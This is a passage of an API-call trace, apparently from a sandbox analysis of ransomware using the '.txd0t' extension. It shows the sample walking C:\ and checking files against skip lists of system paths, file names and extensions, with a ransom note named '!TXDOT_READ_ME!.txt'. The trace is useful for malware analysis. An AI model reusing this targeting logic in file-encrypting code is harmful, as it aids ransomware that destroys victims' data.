ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0114.141] StrCmpW (psz1="$Recycle.Bin", psz2=".") returned -1 [0114.141] StrCmpW (psz1="$Recycle.Bin", psz2="..") returned -1 [0114.141] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0114.141] StrCmpW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=".") returned -1 [0114.141] StrCmpW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="..") returned -1 [0114.141] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0114.141] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0114.141] StrNCatW (in: psz1="C:\\", psz2="$WINRE_BACKUP_PARTITION.MARKER", cchMax=1030 | out: psz1="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned="C:\\$WINRE_BACKUP_PARTITION.MARKER" [0114.141] PathFindExtensionW (pszPath="$WINRE_BACKUP_PARTITION.MARKER") returned=".MARKER" [0114.142] StrCmpW (psz1=".MARKER", psz2=".txd0t") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="bootsect.bak") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="iconcache.db") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="thumbs.db") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=" ransomware ") returned 1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=" ransom ") returned 1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="debug.txt") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="boot.ini") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="desktop.ini") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="autorun.inf") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntuser.dat") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntldr") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntdetect.com") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="bootfont.bin") returned -1 [0114.142] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="!TXDOT_READ_ME!.txt") returned 1 [0114.142] PathFindExtensionW (pszPath="$WINRE_BACKUP_PARTITION.MARKER") returned=".MARKER" [0114.142] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".MARKER") returned 0x0 [0114.142] FileTimeToSystemTime (in: lpFileTime=0x599f654, lpSystemTime=0x599f640 | out: lpSystemTime=0x599f640) returned 1 [0114.142] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x599f640, lpLocalTime=0x599f610 | out: lpLocalTime=0x599f610) returned 1 [0114.142] FileTimeToSystemTime (in: lpFileTime=0x599f65c, lpSystemTime=0x599f620 | out: lpSystemTime=0x599f620) returned 1 [0114.142] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x599f620, lpLocalTime=0x599f630 | out: lpLocalTime=0x599f630) returned 1 [0114.142] FileTimeToSystemTime (in: lpFileTime=0x599f664, lpSystemTime=0x599f5e8 | out: lpSystemTime=0x599f5e8) returned 1 [0114.142] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x599f5e8, lpLocalTime=0x599f5d8 | out: lpLocalTime=0x599f5d8) returned 1 [0114.142] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x599b1edc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x599b1edc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0114.142] StrCmpW (psz1="588bce7c90097ed212", psz2=".") returned 1 [0114.142] StrCmpW (psz1="588bce7c90097ed212", psz2="..") returned 1 [0114.142] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0114.142] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0114.142] StrNCatW (in: psz1="C:\\", psz2="588bce7c90097ed212", cchMax=1030 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0114.142] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\system32\\") returned 0x0 [0114.142] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\syswow64\\") returned 0x0 [0114.142] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\system\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\winsxs\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\roaming\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\local\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\locallow\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\all users\\microsoft\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\inetpub\\logs\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\boot\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\perflogs\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\programdata\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\drivers\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\wsus\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\efstmpwp\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\$recycle.bin\\") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="crypt_detect") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="cryptolocker") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="ransomware") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\WINDOWS") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\Program Files (x86)") returned 0x0 [0114.143] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\Program Files") returned 0x0 [0114.143] GetProcessHeap () returned 0xe30000 [0114.143] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xf0daf8 [0114.143] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0114.143] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\*", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\*") returned="C:\\588bce7c90097ed212\\*" [0114.143] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x599b1edc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x599b1edc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec19b0 [0114.144] StrCmpW (psz1=".", psz2=".") returned 0 [0114.144] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x599b1edc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x599b1edc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.144] StrCmpW (psz1="..", psz2=".") returned 1 [0114.144] StrCmpW (psz1="..", psz2="..") returned 0 [0114.144] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ef6ad6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58ef6ad6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58ef6ad6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0114.144] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0114.144] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0114.144] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0114.144] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0114.144] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt" [0114.144] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0114.144] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0114.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0114.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0114.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0114.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0114.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0114.145] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0114.145] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0114.145] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0114.145] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0114.145] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0114.145] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0114.145] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0114.145] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0114.145] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0114.145] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1025", cAlternateFileName="")) returned 1 [0114.145] StrCmpW (psz1="1025", psz2=".") returned 1 [0114.145] StrCmpW (psz1="1025", psz2="..") returned 1 [0114.145] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0114.145] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0114.145] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1025", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\system32\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\syswow64\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\system\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\winsxs\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\roaming\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\local\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\locallow\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\all users\\microsoft\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\inetpub\\logs\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\boot\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\perflogs\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\programdata\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\drivers\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\wsus\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\efstmpwp\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\$recycle.bin\\") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="crypt_detect") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="cryptolocker") returned 0x0 [0114.145] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="ransomware") returned 0x0 [0114.146] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\WINDOWS") returned 0x0 [0114.146] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\Program Files (x86)") returned 0x0 [0114.146] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\Program Files") returned 0x0 [0114.146] GetProcessHeap () returned 0xe30000 [0114.146] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0114.146] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0114.146] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\*") returned="C:\\588bce7c90097ed212\\1025\\*" [0114.146] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a30 [0114.146] StrCmpW (psz1=".", psz2=".") returned 0 [0114.146] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.146] StrCmpW (psz1="..", psz2=".") returned 1 [0114.146] StrCmpW (psz1="..", psz2="..") returned 0 [0114.146] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ef8d27, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x57ef8d27, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57f1ef3a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0114.146] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0114.146] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0114.146] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0114.146] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0114.146] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1025\\!TXDOT_READ_ME!.txt" [0114.146] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0114.146] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0114.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0114.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0114.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0114.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0114.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0114.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0114.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0114.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0114.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0114.147] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0114.147] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0114.147] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0114.147] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0114.147] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0114.147] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x57ef8d27, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1f8f, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0114.147] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0114.147] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0114.148] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0114.148] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0114.148] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1025\\eula.rtf.txd0t" [0114.148] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0114.148] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.148] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x123e6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0114.148] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0114.148] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0114.148] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0114.148] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0114.148] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.txd0t" [0114.148] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0114.148] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.148] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0114.148] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0114.148] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0114.148] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0114.148] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0114.148] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" [0114.148] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0114.148] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0114.148] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0114.149] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0114.149] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0114.149] StrStrIW 